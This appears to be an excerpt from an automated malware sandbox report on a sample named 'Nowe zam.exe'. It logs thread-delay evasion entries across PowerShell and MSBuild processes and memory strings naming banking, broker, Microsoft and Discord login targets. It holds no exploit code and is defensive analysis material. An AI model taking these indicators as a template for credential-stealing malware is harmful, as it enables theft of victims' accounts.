Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598231	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597907	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597782	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594110	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5895	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3865	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 2059	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 7765	Jump to behavior

Source: C:\Users\user\Desktop\Nowe zam.exe TID: 6892	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7120	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6824	Thread sleep count: 2059 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6824	Thread sleep count: 7765 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -598469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -598231s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -598016s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -597907s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -597782s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -597657s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -597532s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5952	Thread sleep time: -594110s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Nowe zam.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598231	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597907	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597782	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597657	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594110	Jump to behavior

Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696508427t
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696508427s
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696508427f
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696508427t
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696508427t
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696508427\|UE
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696508427o
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696508427j
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
Source: MSBuild.exe, 00000004.00000002.4772141183.0000000000FC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllac
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696508427s
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696508427j
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696508427x
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696508427f
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696508427\|UE
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003FD6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
Source: MSBuild.exe, 00000004.00000002.4775885967.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696508427o
